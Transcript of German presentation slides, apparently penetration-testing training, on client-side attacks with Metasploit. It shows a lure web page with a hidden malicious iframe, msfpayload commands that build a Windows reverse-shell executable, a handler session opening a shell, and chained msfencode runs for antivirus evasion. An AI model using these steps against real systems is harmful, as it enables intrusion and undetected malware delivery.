Metasploit Framework Unleashed Beyond MetasploitWarum Client-Side Exploits? Überwinden des...
Transcript of Metasploit Framework Unleashed Beyond MetasploitWarum Client-Side Exploits? Überwinden des...
Metasploit Framework Unleashed – Beyond Metasploit
Client Side Exploits
Einführung
Exploit-Generierung
AntiVirus Bypass
<< Inhalt <<
Einführung
<< Einführung <<
Client Side Exploits == gerichtete/gezielte Attacken
Zielen auf eine bestimmte Organisation /
Unternehmen / Personen ab
Zielen auf eine spezielle Software oder IT
Infrastruktur ab
<< Einführung <<
Warum Client-Side Exploits?Überwinden des Perimeters ist heutzutage viel schwieriger als früher
Mehr ausgereifte Abwehrtechniken und Verteidigungsprogramme:
- Security Teams- Aufteilung interne / externe / DMZ-Netze- Gehärtete dedizierte Server- Firewalls- IDS/IPS- Security Event Monitoring und Alarmierung- verbessertes Patchmanagement- Verbesserung der Software Sicherheit- erhöhtes Sicherheitsbewußtsein
Was ist dann heutzutage die „low hanging fruit“?
<< Einführung <<
Warum Client-Side Exploits?
Wer hat immer Zugriff aufs interne Netz? Der USER
Wer hat gleichzeitig Zugriff aufs Internet? Der USER
Wer ist eventuell lokaler Admin oder Domänenadmin? Der USER
Wer hat legitimen Zugriff auf sensible Unternehmensdaten? Der USER
Außerdem: Die Arbeitsrechner der User sind (normalerweise) weniger geschützt und gepatcht als Server mehr Angriffsvektoren
Grosse Gefahr: zunehmend 0-day Exploits
<< Einführung <<
Warum gezielte Attacken:
Erkennung:
- bei individuellen Emails ist das Anspringen von Netzwerk Spam- und AV Filtern weniger wahrscheinlich
Social Engineering:
- gezielte Attacken können individuell auf das Opfer zugeschnitten werden- werden daher mit höherer Wahrscheinlichkeit vom Opfer gelesen / geöffnet / angeklickt
<< Einführung <<
Phasen der Attacke:
Informationsgewinnung
- Persönliche Daten: Namen, Email-Adressen, etc.
(Google, Maltego,…..)
- Unternehmensdaten: Abteilungen, Partner, etc.
<< Einführung <<
Phasen der Attacke:
Generierung des CS Exploits:
- metasploit / msfpayload
- SET (Social Engineering Toolkit):
-> Baukasten für Social-Engineering Attacken
-> greift auf Teile von Metasploit zu
- etc.
<< Einführung <<
Phasen der Attacke:
Verbreitung und Zur-Ausführung-Bringung des Exploits mit
Social Engineering
(Email, USB stick,
Fake Websites, ……)
<< Einführung <<
Social Engineering - Email:
<< Einführung <<
Social Engineering – präparierte WebSeite:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Free I Love You Ecards, I Love You Greeting Cards, I Love You Greetings, Cards, ecards, egreetings</title> <meta name=description content="Send free cyber electronic greeting card and postcards with quotes and colors. eCards for holidays,birthdays,graduation,romantic,weddings,thank you,say hello to your friends. All occasion greeting cards,postcards,free eCards."> </head> <body background="bg.gif"> <center> <a href="winner.exe"><img border="0" src="winner.gif"></a><br><br> <font size="+1" face="Arial">Who is loving you? Do you want to know? <br>Just <a href="mylove.exe">click here</a> and choose either "Open" or "Run".</font><br><br><br> <img border="0" src="123g.gif"> </center> <iframe src=“http://www.fakesite.tv/malicious.html" width="1" height="1" style="visibility:hidden;position:absolute"></iframe> </body> </html>
<< Einführung <<
Phasen der Attacke:
Installation der Schadsoftware:
- Backdoor
- Bot
- meterpreter
- etc.
<< Einführung <<
Verbreitung von Malware: Web Browser Sicherheitslücken:
- Buffer Overflows- XSS- Plugins- Java / JavaScript / ActiveX- Information Disclosure: Javascript (Browser History, gecachte Passwörter, Systeminfos, etc.)
Binäre Payloads (eMail, WebSeiten, USB-Sticks, etc.)
File Format Sicherheitslücken:- MS Office Dokumente - PDF (Adobe !!!)- Image Files (jpg: MS04-028, wmf: MS06-001)- Media Files (asf: CVE-2006-4702, asx: CVE-2006-6134)
<< Einführung <<
Exploit-Generierung
<< Exploit-Generierung <<
Binäre Payload mit msfpayload
root@bt4:/pentest/exploits/framework3# ./msfpayload –h
Usage: ./msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[D]ll|[V]BA|[W]ar>
Framework Payloads (225 total)==============================
Name Description---- -----------aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shellaix/ppc/shell_find_port Spawn a shell on an established connectionaix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shellbsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shellbsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shellbsd/x86/exec Execute an arbitrary commandbsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service...
<< Exploit-Generierung <<
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp O
Name: Windows Command Shell, Reverse TCP InlineVersion: 6479Platform: WindowsArch: x86Needs Admin: NoTotal size: 287
Provided by:vlad902 [email protected]
Basic options:Name Current Setting Required Description ---- --------------- -------- -----------EXITFUNC seh yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port
Description:Connect back to attacker and spawn a command shell
<< Exploit-Generierung <<
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp
LHOST=10.10.10.10 LPORT=31337 O
Name: Windows Command Shell, Reverse TCP Inline
Version: 6479
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 287
Provided by:
vlad902 [email protected]
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique: seh, thread, process
LHOST 10.10.10.10 yes The local address
LPORT 31337 yes The local port
Description: Connect back to attacker and spawn a command shell
<< Exploit-Generierung <<
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp
LHOST=10.10.10.10 LPORT=31337 X > /tmp/1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 287
Options: LHOST=10.10.10.10,LPORT=31337
<< Exploit-Generierung <<
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcp
msf exploit(handler) > set LHOST 10.10.10.10LHOST => 10.10.10.10
msf exploit(handler) > set LPORT 31337LPORT => 31337
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Starting the payload handler...[*] Sending stage (474 bytes)[*] Command shell session 1 opened (10.10.10.10:31337 -> 10.10.10.20:1150)
Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Jim\My Documents>
<< Exploit-Generierung <<
Weitere Metasploit Payloads:
Linux Payloads
Java Applet Infection
VBScript Infection
Fileformat Exploits (pdf, MS Office, etc.)
<< Exploit-Generierung <<
AV Bypass
<< AV Bypass <<
Tools:
Packer (UPX, ASPack, NsPack, PE_Compact, …..)
Crypter (EXECryptor, Fearz Crypter, ….)
Msfencode
Technik:
Signaturen verändern (Hex Editor, Debugging und Code verändern, XOR stub, ….)
„Nichts tun“: Malware verhält sich und sieht aus wie eine legitime Applikation (stuxnet)
Eigene Malware schreiben
<< AV Bypass <<
http://blogs.paretologic.com/malwarediaries/index.php/2010/02/22/virustotal/http://www.offensivecomputing.net/?q=node/939
<< AV Bypass <<
Tools:
Packer, Crypter:
<< AV Bypass <<
Tool: msfencode
root@bt4:/pentest/exploits/framework3# ./msfencode -h
Usage: ./msfencode
OPTIONS:
-a The architecture to encode as-b The list of characters to avoid: 'x00xff'-c The number of times to encode the data-e The encoder to use-h Help banner-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)-l List available encoders-m Specifies an additional module search path-n Dump encoder information-o The output file-s The maximum size of the encoded data-t The format to display the encoded buffer with (raw, ruby, perl, c,
exe, vba)
-x <opt> Specify an alternate executable template
<< AV Bypass <<
root@bt4:/pentest/exploits/framework3# ./msfencode -l
Framework Encoders==================
Name Rank Description---- ---- -----------cmd/generic_sh normal Generic Shell Variable Substitution Command Encodergeneric/none normal The "none" Encodermipsbe/longxor normal XOR Encodermipsle/longxor normal XOR Encoderphp/base64 normal PHP Base64 encoderppc/longxor normal PPC LongXOR Encoderppc/longxor_tag normal PPC LongXOR Encodersparc/longxor_tag normal SPARC DWORD XOR Encoderx86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoderx86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoderx86/avoid_utf8_tolower manual Avoid UTF8/tolowerx86/call4_dword_xor normal Call+4 Dword XOR Encoderx86/countdown normal Single-byte XOR Countdown Encoderx86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoderx86/jmp_call_additive great Polymorphic Jump/Call XOR Additive Feedback Encoderx86/nonalpha low Non-Alpha Encoderx86/nonupper low Non-Upper Encoderx86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoderx86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoderx86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
<< AV Bypass <<
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp
LHOST=10.10.10.10 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t exe >
/tmp/2.exe
[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)
<< AV Bypass <<
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp
LHOST=10.10.10.10 LPORT=31337 R |
./msfencode -e x86/shikata_ga_nai -t raw -c 10 |
./msfencode -e x86/call4_dword_xor -t raw -c 10 |
./msfencode -e x86/countdown -t exe > /tmp/3.exe
[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=4)
.
.
.
<< AV Bypass <<
Aus msfpayload –h:
window/shell_reverse_tcp: Connect back to attacker and spawn a command shell
windows/shell/reverse_tcp: Connect back to attacker andspawn a command shell (staged)
<< AV Bypass <<
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell/reverse_tcp
LHOST=10.10.10.10 LPORT=31337 X > /tmp/4.exe
Created by msfpayload (http://www.metasploit.com).Payload: windows/shell/reverse_tcpLength: 278Options: LHOST=10.10.10.10,LPORT=31337
<< AV Bypass <<
Technik: Binary ändern mit Resource Hacker
<< AV Bypass <<
Technik: Binary ändern mit Resource Hacker
<< AV Bypass <<
Technik: Binary ändern mit Resource Hacker
<< AV Bypass <<
Technik: Binary ändern mit Resource Hacker
<< AV Bypass <<
Technik: Binary ändern mit Resource Hacker
<< AV Bypass <<
Vorher:
Nachher:
Technik: XOR stub
<< AV Bypass <<
Unverändertes Binary – auf HD:
Entry Point
Technik: XOR stub
<< AV Bypass <<
Geändertes Binary – auf HD:
Entry Point - Hijacked
Technik: XOR stub
<< AV Bypass <<
Geändertes Binary – in Memory:
Entry Point - Hijacked
<< thx <<
Contact: [email protected] [email protected] http://www.corelan.be:8800